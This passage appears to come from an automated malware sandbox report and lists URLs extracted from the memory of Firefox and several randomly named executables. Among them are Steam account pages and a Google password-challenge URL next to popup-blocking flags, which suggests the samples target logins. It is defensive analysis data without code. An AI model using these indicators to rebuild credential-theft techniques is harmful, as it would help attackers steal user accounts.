Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsmoz-extension://987b
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsEndpoint
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR%
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR%2528not%2Bset%2529
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallback
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackresource://gre/modules/SelectionUtils.sys.mjs
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 00000017.00000002.3123219764.0000028825174000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000017.00000002.3142479922.000002882B1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3109502622.0000028823503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3119588541.00000288245C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3054203227.0000028825F26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825D1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3094636474.0000028821373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B1A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3113740588.0000028823D67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3114071187.0000028823E17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3136131326.0000028826ADF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.00000288260A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3113122822.0000028823CE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3042947416.000002882E2E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3111250234.000002882385B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3108949282.000002882344F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3143683785.000002882B203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3136131326.0000028826A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3113122822.0000028823CBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000017.00000002.3149714295.000002882B64C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000017.00000002.3149714295.000002882B64C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000017.00000002.3149714295.000002882B64C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 7e96f85771.exe, 7e96f85771.exe, 00000008.00000002.3210751552.000000006C91D000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateSERVICE_NOT_ENOUGH_COMMAND_LINE_ARGSSERVICE_STILL_APPLYING_ON_
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000017.00000002.3113740588.0000028823D67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125715171.0000028825B2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3114071187.0000028823E17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F8AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3113740588.0000028823D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F898000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055110674.0000028825DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3108949282.000002882344F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3114716979.0000028823FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825D90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125715171.0000028825BBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F8A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044675435.0000028825DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F825000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3047550593.000002882E25D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3114716979.0000028823FD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul#shouldDisplayRemovalOfEngineNotificati
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.searchinit.secure_opensearch_up
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttps://bugzilla.mozilla.org/show_bug.c
Source: firefox.exe, 00000017.00000002.3127499591.0000028825DE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055110674.0000028825DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044675435.0000028825DE3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/AppMenuNotificat
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ExtensionSetting
Source: 7e96f85771.exe, 00000008.00000002.3210246061.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: firefox.exe, 00000017.00000002.3149714295.000002882B64C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000017.00000002.3149714295.000002882B64C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000017.00000002.3137866600.0000028826C61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.caget
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: 88edf6a100.exe, 0000000A.00000003.3002709062.000000000117F000.00000004.00000020.00020000.00000000.sdmp, 88edf6a100.exe, 0000000A.00000002.3009612520.000000000117F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F70C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055319018.000002882E07D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B1F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3171068076.000002882D72A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.3086539959.0000028814EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 00000017.00000003.3055319018.000002882E07D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwderIdL
Source: firefox.exe, 00000017.00000002.3108949282.0000028823403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000017.00000002.3123219764.0000028825105000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3119588541.00000288245B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3122697624.0000028824B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882510C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000017.00000002.3163888580.000002882BA06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000017.00000002.3163888580.000002882BA24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000017.00000002.3085847545.0000028813611000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.s$oC
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
